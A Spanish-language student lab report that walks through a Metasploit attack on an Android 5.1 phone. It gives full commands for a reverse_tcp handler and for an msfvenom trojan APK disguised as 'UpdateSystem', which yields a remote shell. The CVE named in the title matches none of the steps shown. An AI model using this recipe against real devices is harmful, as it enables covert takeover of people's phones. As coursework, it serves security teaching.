CVE-2017-18192 exploit ejecutado por Metasploit sobre Kali Linux contra un SO Android para acceder al Shell.

Enviado por Rodrigo Andrés… el Lun, 17/12/2018 - 20:55
CVE-2017-18192 exploit ejecutado por Metasploit sobre Kali Linux contra un SO Android para acceder al Shell.

Acceso al Shell de un sistema Android 5.1 a través de reverse tcp ejecutado desde Metasploit sobre Kali Linux

Asignatura

Seguridad en Redes e Información

Profesor

Daniel Pacheco

Sección

780

Fecha

17/12/2018

Alumno

Rodrigo Rojas

Vulnerabilidad

CVE-2017-18192

Herramienta

Metasploit v4.17.17

Distribución

2018.4

Introducción

El objetivo de este trabajo es obtener acceso al Shell de un sistema Android 5.1 a través de un exploit ejecutado desde Metasploit sobre la plataforma Kali Linux. A continuación, se mostrará un paso a paso del trabajo que fue necesario para la consecución del objetivo.

Desarrollo

El ataque se realiza desde Kali Linux, desde la consola se inicia Metasploit con el comando: #msfconsole


1

Metasploit cuenta con una con una base de datos de al menos 900 exploits para distintos sistemas operativos, entre ellos Android.

Con el comando #search type:exploit platform:Android, es posible identificar el exploit que se utilizará para este ataque y que corresponde a multi handler, para su uso se utiliza el comando:

#use exploit/multi/handler

2

Algo similar ocurre con el Payload, para visualizar los correspondientes a Android se utiliza:

#show payloads

3

De aquellos disponibles se utiliza meterpreter reverse tcp, y se aplica con el comando:

#set payload Android/meterpreter/reverse_tcp

4

Es posible obtener información más detallada del exploit a utilizar con el comando:

#info

5

Para poder configurar los parámetros que exige el exploit se requiere conocer la dirección IP del equipo atacante, para ello se utiliza:

#ifconfig

6

Se debe configurar la IP local y el puerto a través del cual se establecerán las conexiones, en este caso la dirección es la 192.168.0.18 y el puerto utilizado el 4444, para aplicarlo se utiliza el comando:

#set lhost 192.168.0.18

#set lport 4444

7

Para verificar que los datos ingresados son los correctos se puede utilizar el comando:

#show options

8

Completados los parámetros ya es posible ejecutar el exploit con el comando:

#exploit -j

9

Ya ejecutado el exploit, ahora se requiere la creación de la aplicación maliciosa que infectará al sistema objetivo. Para aquello se utiliza Msvenom, que es un generador de carga útil nativo de Metasploit. Desde una nueva ventana de consola se crea la APK con la carga útil para Android con el siguiente comando:

#msfvenom -p Android/meterpreter/reverse_tcp –platform Android -o /root/Desktop/UpdateSystem.apk lhost=192.168.0.18 lport=4444

10

El siguiente paso es provocar que la víctima instale la aplicación maliciosa en su celular, por ello se le ha nombrado como UpdateSystem.

11

Una vez ejecutada la aplicación desde la terminal víctima, en la consola del equipo atacante aparecen las notificaciones para los intentos de inicio de sesión como se muestra a continuación:

12

Para observar aquellas sesiones activas se utiliza el comando:

#sessions -i

Y para ingresar a la sesión se utiliza el comando:

#sessions -i 1

13

Ya en la sesión se puede utilizar el comando #help para obtener un listado de los comandos disponibles como se muestra a continuación:

14

Finalmente, para acceder al Shell del sistema basta con ejecutar el comando #shell:

15

Conclusión

Para la realización del ataque fue necesaria la selección de un exploid adecuado contra Android, que permitiera finalmente el acceso al Shell del sistema operativo del dispositivo. Esto demuestra que Metasploit es una herramienta muy completa para el desarrollo de tareas de seguridad o Pentesting, en este caso se demuestra que en simples pasos es posible obtener el control de un dispositivo remoto, tan solo seleccionando el exploit y la carga útil adecuadas. La mayor dificultad se presenta ante el hecho de que la aplicación debe llegar a la víctima y ser instalada, a pesar de que estas pruebas fueron realizadas en un entorno predefinido y controlado, los medios actuales como la ingeniería social permiten perfectamente que este tipo de ataques sean aún viables.